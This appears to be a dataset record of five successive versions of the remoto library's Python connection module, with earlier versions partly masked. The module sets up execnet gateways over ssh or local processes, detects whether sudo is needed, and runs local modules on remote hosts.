"step-1": "<mask token>\n\n\nclass BaseConnection(object):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, hostname, logger=None, sudo=False, threads=1, eager=\n True, detect_sudo=False, use_ssh=False, interpreter=None,\n ssh_options=None):\n self.sudo = sudo\n self.hostname = hostname\n self.ssh_options = ssh_options\n self.logger = logger or basic_remote_logger()\n self.remote_module = None\n self.channel = None\n self.use_ssh = use_ssh\n self.global_timeout = None\n self.interpreter = interpreter or 'python%s' % sys.version_info[0]\n if eager:\n try:\n if detect_sudo:\n self.sudo = self._detect_sudo()\n self.gateway = self._make_gateway(hostname)\n except OSError:\n self.logger.error(\n \"Can't communicate with remote host, possibly because %s is not installed there\"\n % self.interpreter)\n raise\n <mask token>\n\n def _detect_sudo(self, _execnet=None):\n \"\"\"\n ``sudo`` detection has to create a different connection to the remote\n host so that we can reliably ensure that ``getuser()`` will return the\n right information.\n\n After getting the user info it closes the connection and returns\n a boolean\n \"\"\"\n exc = _execnet or execnet\n gw = exc.makegateway(self._make_connection_string(self.hostname,\n use_sudo=False))\n channel = gw.remote_exec(\n 'import getpass; channel.send(getpass.getuser())')\n result = channel.receive()\n gw.exit()\n if result == 'root':\n return False\n self.logger.debug('connection detected need for sudo')\n return True\n <mask token>\n\n def __enter__(self):\n return self\n <mask token>\n <mask token>\n\n def execute(self, function, **kw):\n return self.gateway.remote_exec(function, **kw)\n\n def exit(self):\n self.group.terminate(timeout=1.0)\n\n def import_module(self, module, python_executable=None):\n \"\"\"\n Allows remote execution of a local module. Depending on the\n ``remote_import_system`` attribute it may use execnet's implementation\n or remoto's own based on JSON.\n\n .. note:: It is not possible to use execnet's remote execution model on\n connections that aren't SSH or Local.\n \"\"\"\n if self.remote_import_system is not None:\n if self.remote_import_system == 'json':\n self.remote_module = JsonModuleExecute(self, module, self.\n logger, python_executable=python_executable)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway,\n module, self.logger)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway, module,\n self.logger)\n return self.remote_module\n\n def has_connection(self):\n if self.gateway:\n return self.gateway.hasreceiver()\n return False\n\n\nclass LegacyModuleExecute(object):\n \"\"\"\n This (now legacy) class, is the way ``execnet`` does its remote module\n execution: it sends it over a channel, and does a send/receive for\n exchanging information. This only works when there is native support in\n execnet for a given connection. 
This currently means it would only work for\n ssh and local (Popen) connections, and will not work for anything like\n kubernetes or containers.\n \"\"\"\n\n def __init__(self, gateway, module, logger=None):\n self.channel = gateway.remote_exec(module)\n self.module = module\n self.logger = logger\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = 'module %s does not have attribute %s' % (str(self.module\n ), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n arguments = self._convert_args(args)\n if docstring:\n self.logger.debug(docstring)\n self.channel.send('%s(%s)' % (name, arguments))\n try:\n return self.channel.receive()\n except Exception as error:\n exc_line = str(error)\n for tb_line in reversed(str(error).split('\\n')):\n if tb_line:\n exc_line = tb_line\n break\n raise RuntimeError(exc_line)\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n def _convert_args(self, args):\n if args:\n if len(args) > 1:\n arguments = str(args).rstrip(')').lstrip('(')\n else:\n arguments = str(args).rstrip(',)').lstrip('(')\n else:\n arguments = ''\n return arguments\n\n\n<mask token>\n\n\nclass JsonModuleExecute(object):\n \"\"\"\n This remote execution class allows to ship Python code over to the remote\n node, load it via ``stdin`` and call any function with arguments. The\n resulting response is dumped over JSON so that it can get printed to\n ``stdout``, then captured locally, loaded into regular Python and returned.\n\n If the remote end generates an exception with a traceback, that is captured\n as well and raised accordingly.\n \"\"\"\n\n def __init__(self, conn, module, logger=None, python_executable=None):\n self.conn = conn\n self.module = module\n self._module_source = inspect.getsource(module)\n self.logger = logger\n self.python_executable = python_executable\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = 'module %s does not have attribute %s' % (str(self.module\n ), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n if docstring:\n self.logger.debug(docstring)\n if len(args):\n source = self._module_source + dump_template % (name, repr(\n args))\n else:\n source = self._module_source + dump_template % (name, '()')\n if self.python_executable is None:\n self.python_executable = get_python_executable(self.conn)\n out, err, code = check(self.conn, [self.python_executable],\n stdin=source.encode('utf-8'))\n if not out:\n if not err:\n err = ['Traceback (most recent call last):',\n ' File \"<stdin>\", in <module>', \n 'Exception: error calling \"%s\"' % name]\n if code:\n raise Exception('Unexpected remote exception: \\n%s\\n%s' %\n ('\\n'.join(out), '\\n'.join(err)))\n return\n response = json.loads(out[0])\n if response['exception']:\n raise Exception(response['exception'])\n return response['return']\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass BaseConnection(object):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, hostname, logger=None, sudo=False, threads=1, eager=\n True, detect_sudo=False, use_ssh=False, interpreter=None,\n ssh_options=None):\n self.sudo = sudo\n self.hostname = hostname\n self.ssh_options = ssh_options\n self.logger = logger or basic_remote_logger()\n self.remote_module = None\n self.channel = None\n self.use_ssh = use_ssh\n self.global_timeout = None\n self.interpreter = interpreter or 'python%s' % sys.version_info[0]\n if eager:\n try:\n if detect_sudo:\n self.sudo = self._detect_sudo()\n self.gateway = self._make_gateway(hostname)\n except OSError:\n self.logger.error(\n \"Can't communicate with remote host, possibly because %s is not installed there\"\n % self.interpreter)\n raise\n\n def _make_gateway(self, hostname):\n self.group = execnet.Group()\n gateway = self.group.makegateway(self._make_connection_string(hostname)\n )\n gateway.reconfigure(py2str_as_py3str=False, py3str_as_py2str=False)\n return gateway\n\n def _detect_sudo(self, _execnet=None):\n \"\"\"\n ``sudo`` detection has to create a different connection to the remote\n host so that we can reliably ensure that ``getuser()`` will return the\n right information.\n\n After getting the user info it closes the connection and returns\n a boolean\n \"\"\"\n exc = _execnet or execnet\n gw = exc.makegateway(self._make_connection_string(self.hostname,\n use_sudo=False))\n channel = gw.remote_exec(\n 'import getpass; channel.send(getpass.getuser())')\n result = channel.receive()\n gw.exit()\n if result == 'root':\n return False\n self.logger.debug('connection detected need for sudo')\n return True\n\n def _make_connection_string(self, hostname, _needs_ssh=None, use_sudo=None\n ):\n _needs_ssh = _needs_ssh or needs_ssh\n interpreter = self.interpreter\n if use_sudo is not None:\n if use_sudo:\n interpreter = 'sudo ' + interpreter\n elif self.sudo:\n interpreter = 'sudo ' + interpreter\n if _needs_ssh(hostname) or self.use_ssh:\n if self.ssh_options:\n return 'ssh=%s %s//python=%s' % (self.ssh_options, hostname,\n interpreter)\n else:\n return 'ssh=%s//python=%s' % (hostname, interpreter)\n return 'popen//python=%s' % interpreter\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.group.terminate(timeout=1.0)\n return False\n\n def cmd(self, cmd):\n \"\"\"\n In the base connection class, this method just returns the ``cmd``\n as-is. Other implementations will end up doing transformations to the\n command by prefixing it with other flags needed. See\n :class:`KubernetesConnection` for an example\n \"\"\"\n return cmd\n\n def execute(self, function, **kw):\n return self.gateway.remote_exec(function, **kw)\n\n def exit(self):\n self.group.terminate(timeout=1.0)\n\n def import_module(self, module, python_executable=None):\n \"\"\"\n Allows remote execution of a local module. Depending on the\n ``remote_import_system`` attribute it may use execnet's implementation\n or remoto's own based on JSON.\n\n .. 
note:: It is not possible to use execnet's remote execution model on\n connections that aren't SSH or Local.\n \"\"\"\n if self.remote_import_system is not None:\n if self.remote_import_system == 'json':\n self.remote_module = JsonModuleExecute(self, module, self.\n logger, python_executable=python_executable)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway,\n module, self.logger)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway, module,\n self.logger)\n return self.remote_module\n\n def has_connection(self):\n if self.gateway:\n return self.gateway.hasreceiver()\n return False\n\n\nclass LegacyModuleExecute(object):\n \"\"\"\n This (now legacy) class, is the way ``execnet`` does its remote module\n execution: it sends it over a channel, and does a send/receive for\n exchanging information. This only works when there is native support in\n execnet for a given connection. This currently means it would only work for\n ssh and local (Popen) connections, and will not work for anything like\n kubernetes or containers.\n \"\"\"\n\n def __init__(self, gateway, module, logger=None):\n self.channel = gateway.remote_exec(module)\n self.module = module\n self.logger = logger\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = 'module %s does not have attribute %s' % (str(self.module\n ), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n arguments = self._convert_args(args)\n if docstring:\n self.logger.debug(docstring)\n self.channel.send('%s(%s)' % (name, arguments))\n try:\n return self.channel.receive()\n except Exception as error:\n exc_line = str(error)\n for tb_line in reversed(str(error).split('\\n')):\n if tb_line:\n exc_line = tb_line\n break\n raise RuntimeError(exc_line)\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n def _convert_args(self, args):\n if args:\n if len(args) > 1:\n arguments = str(args).rstrip(')').lstrip('(')\n else:\n arguments = str(args).rstrip(',)').lstrip('(')\n else:\n arguments = ''\n return arguments\n\n\n<mask token>\n\n\nclass JsonModuleExecute(object):\n \"\"\"\n This remote execution class allows to ship Python code over to the remote\n node, load it via ``stdin`` and call any function with arguments. 
The\n resulting response is dumped over JSON so that it can get printed to\n ``stdout``, then captured locally, loaded into regular Python and returned.\n\n If the remote end generates an exception with a traceback, that is captured\n as well and raised accordingly.\n \"\"\"\n\n def __init__(self, conn, module, logger=None, python_executable=None):\n self.conn = conn\n self.module = module\n self._module_source = inspect.getsource(module)\n self.logger = logger\n self.python_executable = python_executable\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = 'module %s does not have attribute %s' % (str(self.module\n ), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n if docstring:\n self.logger.debug(docstring)\n if len(args):\n source = self._module_source + dump_template % (name, repr(\n args))\n else:\n source = self._module_source + dump_template % (name, '()')\n if self.python_executable is None:\n self.python_executable = get_python_executable(self.conn)\n out, err, code = check(self.conn, [self.python_executable],\n stdin=source.encode('utf-8'))\n if not out:\n if not err:\n err = ['Traceback (most recent call last):',\n ' File \"<stdin>\", in <module>', \n 'Exception: error calling \"%s\"' % name]\n if code:\n raise Exception('Unexpected remote exception: \\n%s\\n%s' %\n ('\\n'.join(out), '\\n'.join(err)))\n return\n response = json.loads(out[0])\n if response['exception']:\n raise Exception(response['exception'])\n return response['return']\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass BaseConnection(object):\n \"\"\"\n Base class for Connection objects. Provides a generic interface to execnet\n for setting up the connection\n \"\"\"\n executable = ''\n remote_import_system = 'legacy'\n\n def __init__(self, hostname, logger=None, sudo=False, threads=1, eager=\n True, detect_sudo=False, use_ssh=False, interpreter=None,\n ssh_options=None):\n self.sudo = sudo\n self.hostname = hostname\n self.ssh_options = ssh_options\n self.logger = logger or basic_remote_logger()\n self.remote_module = None\n self.channel = None\n self.use_ssh = use_ssh\n self.global_timeout = None\n self.interpreter = interpreter or 'python%s' % sys.version_info[0]\n if eager:\n try:\n if detect_sudo:\n self.sudo = self._detect_sudo()\n self.gateway = self._make_gateway(hostname)\n except OSError:\n self.logger.error(\n \"Can't communicate with remote host, possibly because %s is not installed there\"\n % self.interpreter)\n raise\n\n def _make_gateway(self, hostname):\n self.group = execnet.Group()\n gateway = self.group.makegateway(self._make_connection_string(hostname)\n )\n gateway.reconfigure(py2str_as_py3str=False, py3str_as_py2str=False)\n return gateway\n\n def _detect_sudo(self, _execnet=None):\n \"\"\"\n ``sudo`` detection has to create a different connection to the remote\n host so that we can reliably ensure that ``getuser()`` will return the\n right information.\n\n After getting the user info it closes the connection and returns\n a boolean\n \"\"\"\n exc = _execnet or execnet\n gw = exc.makegateway(self._make_connection_string(self.hostname,\n use_sudo=False))\n channel = gw.remote_exec(\n 'import getpass; channel.send(getpass.getuser())')\n result = channel.receive()\n gw.exit()\n if result == 'root':\n return False\n self.logger.debug('connection detected need for sudo')\n return True\n\n def _make_connection_string(self, hostname, _needs_ssh=None, use_sudo=None\n ):\n _needs_ssh = _needs_ssh or needs_ssh\n interpreter = self.interpreter\n if use_sudo is not None:\n if use_sudo:\n interpreter = 'sudo ' + interpreter\n elif self.sudo:\n interpreter = 'sudo ' + interpreter\n if _needs_ssh(hostname) or self.use_ssh:\n if self.ssh_options:\n return 'ssh=%s %s//python=%s' % (self.ssh_options, hostname,\n interpreter)\n else:\n return 'ssh=%s//python=%s' % (hostname, interpreter)\n return 'popen//python=%s' % interpreter\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.group.terminate(timeout=1.0)\n return False\n\n def cmd(self, cmd):\n \"\"\"\n In the base connection class, this method just returns the ``cmd``\n as-is. Other implementations will end up doing transformations to the\n command by prefixing it with other flags needed. See\n :class:`KubernetesConnection` for an example\n \"\"\"\n return cmd\n\n def execute(self, function, **kw):\n return self.gateway.remote_exec(function, **kw)\n\n def exit(self):\n self.group.terminate(timeout=1.0)\n\n def import_module(self, module, python_executable=None):\n \"\"\"\n Allows remote execution of a local module. Depending on the\n ``remote_import_system`` attribute it may use execnet's implementation\n or remoto's own based on JSON.\n\n .. 
note:: It is not possible to use execnet's remote execution model on\n connections that aren't SSH or Local.\n \"\"\"\n if self.remote_import_system is not None:\n if self.remote_import_system == 'json':\n self.remote_module = JsonModuleExecute(self, module, self.\n logger, python_executable=python_executable)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway,\n module, self.logger)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway, module,\n self.logger)\n return self.remote_module\n\n def has_connection(self):\n if self.gateway:\n return self.gateway.hasreceiver()\n return False\n\n\nclass LegacyModuleExecute(object):\n \"\"\"\n This (now legacy) class, is the way ``execnet`` does its remote module\n execution: it sends it over a channel, and does a send/receive for\n exchanging information. This only works when there is native support in\n execnet for a given connection. This currently means it would only work for\n ssh and local (Popen) connections, and will not work for anything like\n kubernetes or containers.\n \"\"\"\n\n def __init__(self, gateway, module, logger=None):\n self.channel = gateway.remote_exec(module)\n self.module = module\n self.logger = logger\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = 'module %s does not have attribute %s' % (str(self.module\n ), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n arguments = self._convert_args(args)\n if docstring:\n self.logger.debug(docstring)\n self.channel.send('%s(%s)' % (name, arguments))\n try:\n return self.channel.receive()\n except Exception as error:\n exc_line = str(error)\n for tb_line in reversed(str(error).split('\\n')):\n if tb_line:\n exc_line = tb_line\n break\n raise RuntimeError(exc_line)\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n def _convert_args(self, args):\n if args:\n if len(args) > 1:\n arguments = str(args).rstrip(')').lstrip('(')\n else:\n arguments = str(args).rstrip(',)').lstrip('(')\n else:\n arguments = ''\n return arguments\n\n\n<mask token>\n\n\nclass JsonModuleExecute(object):\n \"\"\"\n This remote execution class allows to ship Python code over to the remote\n node, load it via ``stdin`` and call any function with arguments. 
The\n resulting response is dumped over JSON so that it can get printed to\n ``stdout``, then captured locally, loaded into regular Python and returned.\n\n If the remote end generates an exception with a traceback, that is captured\n as well and raised accordingly.\n \"\"\"\n\n def __init__(self, conn, module, logger=None, python_executable=None):\n self.conn = conn\n self.module = module\n self._module_source = inspect.getsource(module)\n self.logger = logger\n self.python_executable = python_executable\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = 'module %s does not have attribute %s' % (str(self.module\n ), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n if docstring:\n self.logger.debug(docstring)\n if len(args):\n source = self._module_source + dump_template % (name, repr(\n args))\n else:\n source = self._module_source + dump_template % (name, '()')\n if self.python_executable is None:\n self.python_executable = get_python_executable(self.conn)\n out, err, code = check(self.conn, [self.python_executable],\n stdin=source.encode('utf-8'))\n if not out:\n if not err:\n err = ['Traceback (most recent call last):',\n ' File \"<stdin>\", in <module>', \n 'Exception: error calling \"%s\"' % name]\n if code:\n raise Exception('Unexpected remote exception: \\n%s\\n%s' %\n ('\\n'.join(out), '\\n'.join(err)))\n return\n response = json.loads(out[0])\n if response['exception']:\n raise Exception(response['exception'])\n return response['return']\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n\ndef basic_remote_logger():\n logging.basicConfig()\n logger = logging.getLogger(socket.gethostname())\n logger.setLevel(logging.DEBUG)\n return logger\n\n\ndef needs_ssh(hostname, _socket=None):\n \"\"\"\n Obtains remote hostname of the socket and cuts off the domain part\n of its FQDN.\n \"\"\"\n if hostname.lower() in ['localhost', '127.0.0.1', '127.0.1.1']:\n return False\n _socket = _socket or socket\n fqdn = _socket.getfqdn()\n if hostname == fqdn:\n return False\n local_hostname = _socket.gethostname()\n local_short_hostname = local_hostname.split('.')[0]\n if local_hostname == hostname or local_short_hostname == hostname:\n return False\n return True\n\n\n<mask token>\n",
"step-4": "import inspect\nimport json\nimport socket\nimport sys\nimport execnet\nimport logging\nfrom remoto.process import check\n\n\nclass BaseConnection(object):\n \"\"\"\n Base class for Connection objects. Provides a generic interface to execnet\n for setting up the connection\n \"\"\"\n executable = ''\n remote_import_system = 'legacy'\n\n def __init__(self, hostname, logger=None, sudo=False, threads=1, eager=\n True, detect_sudo=False, use_ssh=False, interpreter=None,\n ssh_options=None):\n self.sudo = sudo\n self.hostname = hostname\n self.ssh_options = ssh_options\n self.logger = logger or basic_remote_logger()\n self.remote_module = None\n self.channel = None\n self.use_ssh = use_ssh\n self.global_timeout = None\n self.interpreter = interpreter or 'python%s' % sys.version_info[0]\n if eager:\n try:\n if detect_sudo:\n self.sudo = self._detect_sudo()\n self.gateway = self._make_gateway(hostname)\n except OSError:\n self.logger.error(\n \"Can't communicate with remote host, possibly because %s is not installed there\"\n % self.interpreter)\n raise\n\n def _make_gateway(self, hostname):\n self.group = execnet.Group()\n gateway = self.group.makegateway(self._make_connection_string(hostname)\n )\n gateway.reconfigure(py2str_as_py3str=False, py3str_as_py2str=False)\n return gateway\n\n def _detect_sudo(self, _execnet=None):\n \"\"\"\n ``sudo`` detection has to create a different connection to the remote\n host so that we can reliably ensure that ``getuser()`` will return the\n right information.\n\n After getting the user info it closes the connection and returns\n a boolean\n \"\"\"\n exc = _execnet or execnet\n gw = exc.makegateway(self._make_connection_string(self.hostname,\n use_sudo=False))\n channel = gw.remote_exec(\n 'import getpass; channel.send(getpass.getuser())')\n result = channel.receive()\n gw.exit()\n if result == 'root':\n return False\n self.logger.debug('connection detected need for sudo')\n return True\n\n def _make_connection_string(self, hostname, _needs_ssh=None, use_sudo=None\n ):\n _needs_ssh = _needs_ssh or needs_ssh\n interpreter = self.interpreter\n if use_sudo is not None:\n if use_sudo:\n interpreter = 'sudo ' + interpreter\n elif self.sudo:\n interpreter = 'sudo ' + interpreter\n if _needs_ssh(hostname) or self.use_ssh:\n if self.ssh_options:\n return 'ssh=%s %s//python=%s' % (self.ssh_options, hostname,\n interpreter)\n else:\n return 'ssh=%s//python=%s' % (hostname, interpreter)\n return 'popen//python=%s' % interpreter\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.group.terminate(timeout=1.0)\n return False\n\n def cmd(self, cmd):\n \"\"\"\n In the base connection class, this method just returns the ``cmd``\n as-is. Other implementations will end up doing transformations to the\n command by prefixing it with other flags needed. See\n :class:`KubernetesConnection` for an example\n \"\"\"\n return cmd\n\n def execute(self, function, **kw):\n return self.gateway.remote_exec(function, **kw)\n\n def exit(self):\n self.group.terminate(timeout=1.0)\n\n def import_module(self, module, python_executable=None):\n \"\"\"\n Allows remote execution of a local module. Depending on the\n ``remote_import_system`` attribute it may use execnet's implementation\n or remoto's own based on JSON.\n\n .. 
note:: It is not possible to use execnet's remote execution model on\n connections that aren't SSH or Local.\n \"\"\"\n if self.remote_import_system is not None:\n if self.remote_import_system == 'json':\n self.remote_module = JsonModuleExecute(self, module, self.\n logger, python_executable=python_executable)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway,\n module, self.logger)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway, module,\n self.logger)\n return self.remote_module\n\n def has_connection(self):\n if self.gateway:\n return self.gateway.hasreceiver()\n return False\n\n\nclass LegacyModuleExecute(object):\n \"\"\"\n This (now legacy) class, is the way ``execnet`` does its remote module\n execution: it sends it over a channel, and does a send/receive for\n exchanging information. This only works when there is native support in\n execnet for a given connection. This currently means it would only work for\n ssh and local (Popen) connections, and will not work for anything like\n kubernetes or containers.\n \"\"\"\n\n def __init__(self, gateway, module, logger=None):\n self.channel = gateway.remote_exec(module)\n self.module = module\n self.logger = logger\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = 'module %s does not have attribute %s' % (str(self.module\n ), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n arguments = self._convert_args(args)\n if docstring:\n self.logger.debug(docstring)\n self.channel.send('%s(%s)' % (name, arguments))\n try:\n return self.channel.receive()\n except Exception as error:\n exc_line = str(error)\n for tb_line in reversed(str(error).split('\\n')):\n if tb_line:\n exc_line = tb_line\n break\n raise RuntimeError(exc_line)\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n def _convert_args(self, args):\n if args:\n if len(args) > 1:\n arguments = str(args).rstrip(')').lstrip('(')\n else:\n arguments = str(args).rstrip(',)').lstrip('(')\n else:\n arguments = ''\n return arguments\n\n\ndump_template = \"\"\"\nif __name__ == '__main__':\n import json, traceback\n obj = {'return': None, 'exception': None}\n try:\n obj['return'] = %s%s\n except Exception:\n obj['exception'] = traceback.format_exc()\n try:\n print(json.dumps(obj).decode('utf-8'))\n except AttributeError:\n print(json.dumps(obj))\n\"\"\"\n\n\nclass JsonModuleExecute(object):\n \"\"\"\n This remote execution class allows to ship Python code over to the remote\n node, load it via ``stdin`` and call any function with arguments. 
The\n resulting response is dumped over JSON so that it can get printed to\n ``stdout``, then captured locally, loaded into regular Python and returned.\n\n If the remote end generates an exception with a traceback, that is captured\n as well and raised accordingly.\n \"\"\"\n\n def __init__(self, conn, module, logger=None, python_executable=None):\n self.conn = conn\n self.module = module\n self._module_source = inspect.getsource(module)\n self.logger = logger\n self.python_executable = python_executable\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = 'module %s does not have attribute %s' % (str(self.module\n ), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n if docstring:\n self.logger.debug(docstring)\n if len(args):\n source = self._module_source + dump_template % (name, repr(\n args))\n else:\n source = self._module_source + dump_template % (name, '()')\n if self.python_executable is None:\n self.python_executable = get_python_executable(self.conn)\n out, err, code = check(self.conn, [self.python_executable],\n stdin=source.encode('utf-8'))\n if not out:\n if not err:\n err = ['Traceback (most recent call last):',\n ' File \"<stdin>\", in <module>', \n 'Exception: error calling \"%s\"' % name]\n if code:\n raise Exception('Unexpected remote exception: \\n%s\\n%s' %\n ('\\n'.join(out), '\\n'.join(err)))\n return\n response = json.loads(out[0])\n if response['exception']:\n raise Exception(response['exception'])\n return response['return']\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n\ndef basic_remote_logger():\n logging.basicConfig()\n logger = logging.getLogger(socket.gethostname())\n logger.setLevel(logging.DEBUG)\n return logger\n\n\ndef needs_ssh(hostname, _socket=None):\n \"\"\"\n Obtains remote hostname of the socket and cuts off the domain part\n of its FQDN.\n \"\"\"\n if hostname.lower() in ['localhost', '127.0.0.1', '127.0.1.1']:\n return False\n _socket = _socket or socket\n fqdn = _socket.getfqdn()\n if hostname == fqdn:\n return False\n local_hostname = _socket.gethostname()\n local_short_hostname = local_hostname.split('.')[0]\n if local_hostname == hostname or local_short_hostname == hostname:\n return False\n return True\n\n\ndef get_python_executable(conn):\n \"\"\"\n Try to determine the remote Python version so that it can be used\n when executing. Avoids the problem of different Python versions, or distros\n that do not use ``python`` but do ``python3``\n \"\"\"\n executables = ['python3', 'python', 'python2.7']\n for executable in executables:\n conn.logger.debug(\n 'trying to determine remote python executable with %s' % executable\n )\n out, err, code = check(conn, ['which', executable])\n if code:\n conn.logger.warning('skipping %s, was not found in path' %\n executable)\n else:\n try:\n return out[0].strip()\n except IndexError:\n conn.logger.warning('could not parse stdout: %s' % out)\n conn.logger.info('Falling back to using interpreter: %s' % conn.interpreter\n )\n return conn.interpreter\n",
"step-5": "import inspect\nimport json\nimport socket\nimport sys\nimport execnet\nimport logging\nfrom remoto.process import check\n\n\nclass BaseConnection(object):\n \"\"\"\n Base class for Connection objects. Provides a generic interface to execnet\n for setting up the connection\n \"\"\"\n executable = ''\n remote_import_system = 'legacy'\n\n def __init__(self, hostname, logger=None, sudo=False, threads=1, eager=True,\n detect_sudo=False, use_ssh=False, interpreter=None, ssh_options=None):\n self.sudo = sudo\n self.hostname = hostname\n self.ssh_options = ssh_options\n self.logger = logger or basic_remote_logger()\n self.remote_module = None\n self.channel = None\n self.use_ssh = use_ssh\n self.global_timeout = None # wait for ever\n\n self.interpreter = interpreter or 'python%s' % sys.version_info[0]\n\n if eager:\n try:\n if detect_sudo:\n self.sudo = self._detect_sudo()\n self.gateway = self._make_gateway(hostname)\n except OSError:\n self.logger.error(\n \"Can't communicate with remote host, possibly because \"\n \"%s is not installed there\" % self.interpreter\n )\n raise\n\n def _make_gateway(self, hostname):\n self.group = execnet.Group()\n gateway = self.group.makegateway(\n self._make_connection_string(hostname)\n )\n gateway.reconfigure(py2str_as_py3str=False, py3str_as_py2str=False)\n return gateway\n\n def _detect_sudo(self, _execnet=None):\n \"\"\"\n ``sudo`` detection has to create a different connection to the remote\n host so that we can reliably ensure that ``getuser()`` will return the\n right information.\n\n After getting the user info it closes the connection and returns\n a boolean\n \"\"\"\n exc = _execnet or execnet\n gw = exc.makegateway(\n self._make_connection_string(self.hostname, use_sudo=False)\n )\n\n channel = gw.remote_exec(\n 'import getpass; channel.send(getpass.getuser())'\n )\n\n result = channel.receive()\n gw.exit()\n\n if result == 'root':\n return False\n self.logger.debug('connection detected need for sudo')\n return True\n\n def _make_connection_string(self, hostname, _needs_ssh=None, use_sudo=None):\n _needs_ssh = _needs_ssh or needs_ssh\n interpreter = self.interpreter\n if use_sudo is not None:\n if use_sudo:\n interpreter = 'sudo ' + interpreter\n elif self.sudo:\n interpreter = 'sudo ' + interpreter\n\n if _needs_ssh(hostname) or self.use_ssh:\n if self.ssh_options:\n return 'ssh=%s %s//python=%s' % (\n self.ssh_options, hostname, interpreter\n )\n else:\n return 'ssh=%s//python=%s' % (hostname, interpreter)\n return 'popen//python=%s' % interpreter\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.group.terminate(timeout=1.0)\n return False\n\n def cmd(self, cmd):\n \"\"\"\n In the base connection class, this method just returns the ``cmd``\n as-is. Other implementations will end up doing transformations to the\n command by prefixing it with other flags needed. See\n :class:`KubernetesConnection` for an example\n \"\"\"\n return cmd\n\n def execute(self, function, **kw):\n return self.gateway.remote_exec(function, **kw)\n\n def exit(self):\n self.group.terminate(timeout=1.0)\n\n def import_module(self, module, python_executable=None):\n \"\"\"\n Allows remote execution of a local module. Depending on the\n ``remote_import_system`` attribute it may use execnet's implementation\n or remoto's own based on JSON.\n\n .. 
note:: It is not possible to use execnet's remote execution model on\n connections that aren't SSH or Local.\n \"\"\"\n if self.remote_import_system is not None:\n if self.remote_import_system == 'json':\n self.remote_module = JsonModuleExecute(self, module, self.logger,\n python_executable=python_executable)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway, module, self.logger)\n else:\n self.remote_module = LegacyModuleExecute(self.gateway, module, self.logger)\n return self.remote_module\n\n def has_connection(self):\n if self.gateway:\n return self.gateway.hasreceiver()\n return False\n\n\nclass LegacyModuleExecute(object):\n \"\"\"\n This (now legacy) class, is the way ``execnet`` does its remote module\n execution: it sends it over a channel, and does a send/receive for\n exchanging information. This only works when there is native support in\n execnet for a given connection. This currently means it would only work for\n ssh and local (Popen) connections, and will not work for anything like\n kubernetes or containers.\n \"\"\"\n\n def __init__(self, gateway, module, logger=None):\n self.channel = gateway.remote_exec(module)\n self.module = module\n self.logger = logger\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = \"module %s does not have attribute %s\" % (str(self.module), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n arguments = self._convert_args(args)\n if docstring:\n self.logger.debug(docstring)\n self.channel.send(\"%s(%s)\" % (name, arguments))\n try:\n return self.channel.receive()\n except Exception as error:\n # Error will come as a string of a traceback, remove everything\n # up to the actual exception since we do get garbage otherwise\n # that points to non-existent lines in the compiled code\n exc_line = str(error)\n for tb_line in reversed(str(error).split('\\n')):\n if tb_line:\n exc_line = tb_line\n break\n raise RuntimeError(exc_line)\n\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n def 